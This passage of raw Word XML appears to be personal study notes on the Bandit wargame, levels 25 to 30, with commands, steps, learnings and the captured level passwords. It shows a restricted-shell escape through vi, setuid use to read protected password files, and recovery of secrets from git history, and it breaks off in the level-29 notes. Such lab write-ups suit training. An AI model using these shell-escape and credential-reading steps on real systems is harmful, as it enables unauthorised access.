    <w:p w14:paraId="26CE7AEE" w14:textId="1F462CE0" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Learning: Implement brute force attacks and understand the importance of rate limiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4EC2D1" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7812FAA1" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="56E11CC2" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="15191E63" w14:textId="7DDE89B4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25 → Level 26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAF829E" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="0B32F29E" w14:textId="0DB94E0E" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Tools Used: vi/vim, shell escape</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C925DC2" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="5623A475" w14:textId="69743942" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Escape restricted shell through text editor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3068F332" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="4546A513" w14:textId="7622B2F4" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Commands Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73865EA0" w14:textId="78D3F96A" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E903DC" w14:textId="3CD68FCC" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>cat /etc/passwd | grep bandit26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A45B967" w14:textId="75665E16" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>ssh bandit26@localhost -p 2220 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> bandit26.sshkey</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE6A43E" w14:textId="079E7A68" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>:set shell?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E37DA3B" w14:textId="5CAC4F05" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>:set shell=/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBBDF01" w14:textId="630011AA" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>:set shell?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5566ED79" w14:textId="20B36A47" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>:ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BF7F0C" w14:textId="0A8AD36D" w:rsidR="00B305D3" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>cat /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bandit_pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bandit26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77118B0D" w14:textId="77777777" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD"/>
    <w:p w14:paraId="2A79AA68" w14:textId="03674B88" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188B105B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>1. Connected but was dropped into restricted `more` command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FF42DC" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Pressed `v` in more to enter vi editor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B4B68E" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>3. Changed shell setting and escaped to bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCC4E1C" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>4. Read password file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDD70ED" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="4941E52D" w14:textId="4216FD1C" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0001C838" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6AA9CA" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: s0773xxkk0MXfdqOfPRVr9L3jJBUOgCZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0092FD" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="2313A4C4" w14:textId="194F1515" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Learning: Escape restricted environments using text editor capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A4B72A" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B5D70B8" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="077EE171" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="299B599C" w14:textId="5D55A9B0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lastRenderedPageBreak/>
        <w:t>Level 26 → Level 27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C979EE" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="17578B83" w14:textId="3761C6D1" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Tools Used: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148FD139" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="6C5A26C2" w14:textId="6C56B3B6" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Objective: Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> binary to access bandit27 password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598DE360" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="3358C04E" w14:textId="0F5E56E3" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Commands Used: `./bandit27-do cat /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bandit_pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bandit27`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED62F6C" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="29E64031" w14:textId="49D79C40" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01395851" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">1. Found </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> binary for bandit27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFDDDF7" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Used it to read protected password file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19390B99" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="3C7EBAC5" w14:textId="53532E73" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CFF304" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AAC1B6" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: upsNCc7vzaRDx6oZC6GiR6ERwe1MowGB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D6341D" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="599A23EF" w14:textId="147232B1" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Learning: Apply </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> binary knowledge from previous levels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09617B24" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FA0A61F" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="3DBF602D" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="71D978EF" w14:textId="3A5BA2F9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27 → Level 28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0159D1" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="31DF7D78" w14:textId="78873787" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Tools Used: git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DD3690" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="72832793" w14:textId="61207E1E" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Clone git repository to find password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C921682" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7B764679" w14:textId="0DBBCFAA" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Commands Used: </w:t>
      </w:r>
      <w:r w:rsidR="00B45AFD">
        <w:t>`</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B45AFD">
        <w:t>mktemp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B45AFD">
        <w:t xml:space="preserve"> -d`, </w:t>
      </w:r>
      <w:r>
        <w:t>`git clone ssh://bandit27-git@localhost:2220/home/bandit27-git/repo`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037A9A94" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="1188D4BE" w14:textId="6A32023B" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4956409C" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>1. Cloned git repository using SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF9745F" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Found README file containing password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F20FDD" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="595789B2" w14:textId="7769122A" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4A4789" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A70C63" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: Yz9IpL0sBcCeuG7m9uQFt8ZNpS4HZRcN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9325F4" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="4123E260" w14:textId="0ECFAFD8" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Learning: Basic git repository cloning and file examination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B04389" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F2D7BB3" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="676CD98C" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="55E2B144" w14:textId="05AABA44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28 → Level 29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B75CA2" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="3969B860" w14:textId="31458A7E" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Tools Used: git log, git show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D308BA" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="660296D8" w14:textId="266A52E9" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Find password in git commit history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C61BD0E" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="1C9E7ABC" w14:textId="646B8CB2" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Commands Used: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA92D40" w14:textId="470B6B91" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t>- `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mktemp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -d</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077146DD" w14:textId="1C2A6C40" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t>- `</w:t>
      </w:r>
      <w:r>
        <w:t>git clone ssh://bandit28-git@localhost:2220/home/bandit28-git/repo</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D73E11" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- `git log`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A74B565" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- `git show f257900db7c134cb5224c91013817e76d18457e0`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5FA567" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="025945BA" w14:textId="0E03A8CD" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D493DD" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>1. Examined git commit history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37394DF8" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Found commit that removed password from README</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C70F4EB" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>3. Viewed commit diff to see original password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04709C56" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="6F2A5539" w14:textId="75F6F782" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46145E92" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167CF26A" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: 4pT1t5DENaYuqnqvadYs1oE4QLCdjmJ7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526C8B26" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="292304F3" w14:textId="04D38743" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Learning: Investigate git history to find accidentally committed sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F81B771" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DE3D870" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="2C0BE56E" w14:textId="77777777" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00B305D3"/>
    <w:p w14:paraId="05B9F097" w14:textId="77777777" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00B305D3"/>
    <w:p w14:paraId="0B84896B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7698725C" w14:textId="01B86639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29 → Level 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51681EDE" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="227516C6" w14:textId="7DE406A0" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Tools Used: git branch, git checkout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F76188" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="2D654957" w14:textId="1BE1F54E" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Find password in different git branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BB6B85" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="2E189549" w14:textId="17B8BB0D" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Commands Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73397439" w14:textId="77777777" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mktemp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2CB008" w14:textId="3F8BC95F" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>git clone ssh://bandit29-git@localhost:2220/home/bandit29-git/repo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136A1088" w14:textId="052DA1F8" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>cd repo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6708DAFD" w14:textId="44FD4AD9" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C614D8" w14:textId="143CB902" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>cat README.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1A82C1" w14:textId="1DA24B76" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>git log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5716E93F" w14:textId="023681C0" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>git checkout 57d7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FF0C80" w14:textId="57AC5D32" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>git branch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678F5294" w14:textId="71C38FCC" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>git checkout master</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005FEDEF" w14:textId="52758550" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">git status </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B378818" w14:textId="614CC51F" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">git branch -a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6CE93F" w14:textId="17E3883D" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>git checkout dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193CE6BD" w14:textId="661D3599" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">git status </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506C93C3" w14:textId="1336950D" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529F0706" w14:textId="28656705" w:rsidR="00B305D3" w:rsidRDefault="00B45AFD" w:rsidP="00B45AFD">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>cat README.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606FDE78" w14:textId="77777777" w:rsidR="00B45AFD" w:rsidRDefault="00B45AFD" w:rsidP="00B305D3"/>
    <w:p w14:paraId="39DD4746" w14:textId="552DFDD6" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
